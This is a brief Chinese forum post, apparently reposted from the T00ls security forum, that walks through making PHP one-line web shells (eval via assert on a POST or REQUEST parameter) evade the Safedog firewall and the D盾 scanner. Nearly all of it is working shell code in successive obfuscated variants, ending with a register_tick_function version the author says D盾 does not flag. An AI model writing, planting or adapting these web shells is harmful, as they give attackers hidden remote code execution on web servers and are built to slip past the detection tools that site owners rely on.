首发T00ls,原文地址https://www.t00ls.net/thread-45367-1-1.html
这边也是才进t00ls,算是一个小小的分享吧。
首先是过安全狗,这里讲下怎么一步步过安全狗。
首先下面这个马很简单,只用了一个变量覆盖,所以,不出所料被杀了
$b=$_POST['x'];
$a='b';
@assert($$a);
马被杀了那肯定要想办法免杀,我们试试把assert分开呢?
$b=$_POST['x'];
$a='b';
$c=’a’.’s’.’s’.’e’.’r’.’t’;
@$c($$a);
还是不行,,那我再想想其他办法,引用下?换个思路呀?
$a='b';
$b=&$d;
$c='a'.'s'.'s'.'e'.'r'.'t';
$d=$_POST['x'];
$c($$a);
可以了,,这边可以看到,其实安全狗多绕绕,他就晕掉了。不过这个D盾还是会报警。
下面就分享一个D盾不报警的吧。
<?php
$a=array("assert"=>"XC90");
$b=array_keys($a,'XC90');
declare(ticks=1);
register_tick_function($b[0], $_REQUEST['x']);
?>